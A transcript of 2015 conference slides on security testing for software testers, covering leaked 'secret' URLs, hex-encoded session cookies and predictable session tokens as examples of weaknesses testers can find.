4/23/15 1 Test and Verification Solutions Security Testing: What Testers Can Do Delivering Tailored Solutions for Hardware Verification and Software Testing STAR East - Florida 7 th May 2015 Declan O’Riordan Copyright TVS Limited | Private & Confidential | Page 2 What is driving security? Firewalls / IDS / IPS based upon pattern- matching ‘known bad’ REGEX COBIT, ITIL, CMMI, ISO17799, OCTAVE, OSSTMM ISO 27005, ISO 27033, ISO 27799, ISO 15489 ISO/IEC 13335, ISO/IEC 22301:2012 & PAS77, ISO 9000, ISO 27006, ISO 15408
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
4/23/15
1
Test and Verification Solutions
Security Testing: What Testers Can Do
Delivering Tailored Solutions for Hardware Verification and Software Testing
No one will know that sensi4ve func4on / resource URL. It’s secret!
But URLs appear in logs, browser histories, and are displayed on-‐screen. They can be emailed, bookmarked, and wri(en down. A(ackers find them in client-‐side JavaScript, brute-‐force the names / iden4fiers (response codes 302, 400, 401, 403, 500), inference from published content, search engines, web archives, and leveraging the web server. Copyright TVS Limited | Private & Confidential | Page 20
HTTP is stateless. Each request-response message pair is an independent transaction. Dynamic web-application functionality requires a SESSION to link user requests. Typically this is implemented by issuing each user a unique session token which is resubmitted by the user to link sequences of requests. Set-Cookie: ASP.NET_SessionId=75 73 65 72 3d 64 65 63 6c 61 6e 3b 61 70 70 3d 61 64 6d 69 6e 3b 64 61 74 65 3d 30 35 2f 30 37 2f 32 30 31 35 user=declan;app=admin;date=05/07/2015
Concealed sequences Weak random number generation Time dependencies 56543-1424798254115 56544-1424798303925 ? 56546-1424798337916 The first component is an incrementing sequence. The second component is the time in milliseconds. The missing value was issued to another user and can be predicted / brute forced within the range of possibilities.
Firewalls / IDS / IPS based upon pattern-matching ‘known bad’ REGEX
• Security skills are within the project team capability • Recognize which security tests you can do now • Effectively manage the experts who are helping you